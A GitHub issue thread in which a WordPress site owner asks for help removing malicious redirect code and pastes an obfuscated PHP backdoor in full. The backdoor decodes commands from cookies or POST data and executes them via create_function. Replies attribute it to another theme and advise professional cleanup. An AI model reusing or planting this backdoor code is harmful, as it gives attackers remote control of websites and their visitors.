### ISSUE TITLE
Malicious redirect code found .php how to remove?

### ISSUE THREAD

**Issue by franceslea** [understrap/understrap#1238]
Please delete anything that does not apply for you!

## Issue is about..

  - [ ] I need help

## Please tell us about your environment:

  - **WordPress Version:** 4.9.x
  - **OS Version:** [ | Windows 10] |
  - **Browser:** [ Chrome XX | Firefox XX]
  - **Language:** [ all | PHP | S/CSS | Javascript ]

---
I tried simply deleting it and updating the file but it still redirects  for all new users. https://bestcoastbeauty.com/

Here's the code I found that shouldn't be there:
<?php
$ggfjm = '462\'c*oyt1a#reHmp097u-vgdi8nsk3bx_f5l';$dfuncu = Array();$dfuncu[] = $ggfjm[4].$ggfjm[12].$ggfjm[13].$ggfjm[10].$ggfjm[8].$ggfjm[13].$ggfjm[33].$ggfjm[34].$ggfjm[20].$ggfjm[27].$ggfjm[4].$ggfjm[8].$ggfjm[25].$ggfjm[6].$ggfjm[27];$dfuncu[] = $ggfjm[2].$ggfjm[26].$ggfjm[18].$ggfjm[19].$ggfjm[26].$ggfjm[1].$ggfjm[13].$ggfjm[1].$ggfjm[21].$ggfjm[30].$ggfjm[0].$ggfjm[35].$ggfjm[18].$ggfjm[21].$ggfjm[0].$ggfjm[9].$ggfjm[19].$ggfjm[30].$ggfjm[21].$ggfjm[26].$ggfjm[1].$ggfjm[24].$ggfjm[4].$ggfjm[21].$ggfjm[34].$ggfjm[17].$ggfjm[30].$ggfjm[18].$ggfjm[9].$ggfjm[34].$ggfjm[31].$ggfjm[30].$ggfjm[24].$ggfjm[18].$ggfjm[10].$ggfjm[13];$dfuncu[] = $ggfjm[14].$ggfjm[5];$dfuncu[] = $ggfjm[11];$dfuncu[] = $ggfjm[4].$ggfjm[6].$ggfjm[20].$ggfjm[27].$ggfjm[8];$dfuncu[] = $ggfjm[28].$ggfjm[8].$ggfjm[12].$ggfjm[33].$ggfjm[12].$ggfjm[13].$ggfjm[16].$ggfjm[13].$ggfjm[10].$ggfjm[8];$dfuncu[] = $ggfjm[13].$ggfjm[32].$ggfjm[16].$ggfjm[36].$ggfjm[6].$ggfjm[24].$ggfjm[13];$dfuncu[] = $ggfjm[28].$ggfjm[20].$ggfjm[31].$ggfjm[28].$ggfjm[8].$ggfjm[12];$dfuncu[] = $ggfjm[10].$ggfjm[12].$ggfjm[12].$ggfjm[10].$ggfjm[7].$ggfjm[33].$ggfjm[15].$ggfjm[13].$ggfjm[12].$ggfjm[23].$ggfjm[13];$dfuncu[] = $ggfjm[28].$ggfjm[8].$ggfjm[12].$ggfjm[36].$ggfjm[13].$ggfjm[27];$dfuncu[] = $ggfjm[16].$ggfjm[10].$ggfjm[4].$ggfjm[29];foreach ($dfuncu[8]($_COOKIE, $_POST) as $ztuzwz => $mezhram){function zjktuo($dfuncu, $ztuzwz, $njgxgl){return $dfuncu[7]($dfuncu[5]($ztuzwz . $dfuncu[1], ($njgxgl / $dfuncu[9]($ztuzwz)) + 1), 0, $njgxgl);}function zhoax($dfuncu, $rrmbo){return @$dfuncu[10]($dfuncu[2], $rrmbo);}function pfefnmu($dfuncu, $rrmbo){$zgwba = $dfuncu[4]($rrmbo) % 3;if (!$zgwba) {$jfpie = $dfuncu[0]; $tyfbgls = $jfpie("", $rrmbo[1]($rrmbo[2]));$tyfbgls();exit();}}$mezhram = zhoax($dfuncu, $mezhram);pfefnmu($dfuncu, $dfuncu[6]($dfuncu[3], $mezhram ^ zjktuo($dfuncu, $ztuzwz, $dfuncu[9]($mezhram))));}
#
![bug](https://user-images.githubusercontent.com/76146277/102449331-e1e86b00-3fe8-11eb-968e-d70e13ab9205.png)

**Comment by axlright** [comment]
That appears to be code from a different theme called Guinevere. Do you have that theme installed in addition to Understrap?

**Comment by IanDelMar** [comment]
The theme is not only installed but it seems to the active theme: https://www.etsy.com/de/listing/772274827/neu-guinevere-wordpress-theme-responsive

**Comment by pattonwebz** [comment]
Sorry to hear you have found this on your site. It is not an issue with the understap theme that caused this though.

In cases like this where you have found malicious code in your site you should hire a profressional to cleaup for you if you are not familiar with the cleanup process needed yourself (it's not just a case of deleting the file). Be careful about telling people in public places that your site has been compromised because it makes it a target for others to try gain access too.
